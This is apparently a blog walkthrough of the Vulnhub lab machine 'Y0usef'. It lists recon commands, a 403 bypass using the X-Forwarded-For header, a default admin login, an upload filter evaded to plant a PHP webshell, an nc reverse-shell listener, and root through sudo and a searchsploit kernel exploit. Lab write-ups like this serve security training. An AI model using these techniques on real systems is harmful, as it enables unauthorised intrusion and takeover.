Y0usef Walkthrough – Vulnhub – Writeup

Y0usef is an easy machine from Vulnhub. This requires a bit of enumeration at the beginning. However, upon getting the foothold, it’s relatively easy. Also, I have tested this on VirtualBox. “Y0usef Walkthrough – Vulnhub – Writeup”

Link to the machine: https://www.vulnhub.com/entry/y0usef-1,624/

Gigachad Walkthrough – Vulnhub – Writeup

Identify the target

Firstly, we have to identify the IP address of the target machine. However, to do this we must have configured the machine in the same network. So, make sure that you have connected your pentesting distro and the target machine in the same NAT network.

sudo netdiscover -i eth0 -r 10.0.2.0/24
Netdiscover result – 10.0.2.64 is the target

Scan open orts

Next, we have to scan the open ports on the target machine. Since we are in the local environment, we can scan all of the ports. Otherwise, we can check the top ports for the sake of saving time.

nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.64
Nmap scan result shows SSH and HTTP ports open

We can see from the results above that we only have an HTTP port to look further into.

Enumerate the web server

Now, we have to check the webserver if it has anything.

Home page of the website

The homepage of the website doesn’t have any important information, neither does its source code has. Therefore, we need to check if we can find any new paths.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -e .html,.php,.txt -u http://10.0.2.64/FUZZ -of html -o dir.html

To my surprise, I didn’t get anything using ‘directory-list-2.3-big.txt’ which is one of the largest dictionaries. However, another dictionary ‘raft’ gave me a path.

FFUF result

Unfortunately, the path gave me a Forbidden error.

Forbidden error

Since this is the only result we have got waiting a long time, we have to find a way to bypass this forbidden access. One speculation is that the web app might be behind a proxy.

Reference: https://book.hacktricks.xyz/pentesting/pentesting-web#403-forbidden-basic-authentication-401-unauthorized-bypass

Upon adding a header, X-Forwarded-For: 127.0.0.1, we could bypass the restrictions in this application.

Bypass using X-Forwarded-For header
Login page after bypassing the restrictions

I tried SQL injection but I couldn’t do the exploit. However, it used a simple combination of admin: admin. This gives us access to a new dashboard that doesn’t have any restrictions.

Dashboard

Inject webshell

After we log in, we see that the app has a feature to upload files. So, we can try injecting a webshell.

Upload error – PHP file

When I tried to upload a PHP file, it gave me an error. But it allowed image files. So, I downloaded a PNG file ‘nepcodex.png’. Then, I uploaded the file with Burp Suite as a proxy. On the intercepted request, we have to change the extension of the file. Next, I added a code to get the reverse shell. Finally, the upload was successful and we see a link at the top of the app.

Uploaded request
Uploaded response

We can now spawn a reverse shell from this.

nc -nlvp 9001

Finally, I executed the uploaded file and it gave me the reverse shell.

Executed script
Spawned reverse shell

Next, I improved the reverse shell using the following link.

Upgrade to an intelligent reverse shell

Escalate privileges

On the path /home, we have a file ‘user.txt’. The file has a base64 encoded text that contained the username and password.

/home path

Since we have a password for a user, I logged in using the SSH service.

Logged in as user yousef

If we look at the sudo permissions of the user, we will find that it can execute all commands as all users. Furthermore, the system also had an old kernel that suffers local privilege escalation.

Sudo permissions of yousef and old kernel
Privilege escalation using sudo permissions

In this way, we can escalate to root in this machine. Now, let’s do the alternative way.

Linux Kernel 3.13 LPE

We can search the exploits in Kali Linux using searchsploit as follows.

searchsploit linux kernel 3.13
Exploits relating to Linux Kernel

Next, I copied the exploit to my working directory and transferred it to the machine using SCP.

searchsploit -m 37292
Get the exploit to the working directory
scp 37292.c yousef@10.0.2.64:/tmp
Transfer file using scp

Lastly, I switched to /tmp directory, compiled the code and executed it.

cd /tmp
gcc 37292.c -o exploit
./exploit
Privilege escalation using Linux kernel exploit

Leave a comment